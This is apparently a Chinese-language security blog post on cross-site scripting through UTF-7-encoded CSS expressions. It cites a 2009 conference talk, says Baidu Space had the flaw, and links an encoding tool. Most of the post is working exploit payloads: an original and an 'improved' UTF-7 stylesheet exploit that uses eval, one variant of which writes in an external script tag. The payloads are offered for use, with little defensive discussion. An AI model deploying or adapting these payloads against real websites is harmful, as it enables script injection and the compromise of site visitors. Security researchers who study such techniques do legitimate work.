【XSS】CSS expressions with UTF-7,UTF-7 编码 XSS 漏洞:https://lcx.cc/post/1198/

utf-7 编码跨站漏洞,是09年某黑客大会提出来的(XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf),不过国内一直无人研究。

百度空间存在该漏洞很久了,目前才修复(不知道那个蛋疼的提交到乌云了)。

网上所有的转换工具全部不是完全转换的,只转换了特殊符号。。。

针对这个,以前蛋疼的根据这个编码介绍,自己写了个完全转换的。。。

CSS expressions with UTF-7

  1. UTF-7 BOM character can force UTF-7 in a external style sheet
  2. Would you let me upload a style sheet?
  3. @charset ?UTF-7?; works
  4. But you don?t need it
  5. +/v8 is all you need

原版 Exp:

+/v8

body {
    font-family:'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAJw-';
}
//x';xss:expression(alert(1));font-family:'

改良 Exp:

+/v8

body {
    font-family:"+AHgAIgA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvAHcALgB4AG8AeAA9AD0AMQApAD8AJwAnADoAZQB2AGEAbAAoACIAeABvAHgAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdAAoAC8AWABTAFMAIQAvACkAKQA7ACIAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAI-";
}
//x";xss:expression((window.xox==1)?'':eval("xox=1;eval(alert(/XSS!/));"));font-family:"
//x";xss:expression((window.xox==1)?'':eval("xox=1;document.write('<script src=js.js></script>');"));font-family:"

utf-7 编码、解码工具下载:http://www.uudisc.com/user/nuclearatk/file/4008510

XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf,该书下载地址:http://www.uudisc.com/user/nuclearatk/file/4008516

2012-11-4 12:42:29 补充:

网盘地址已失效,新的下载地址为:

UTF-7 编码解码工具.rar

XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf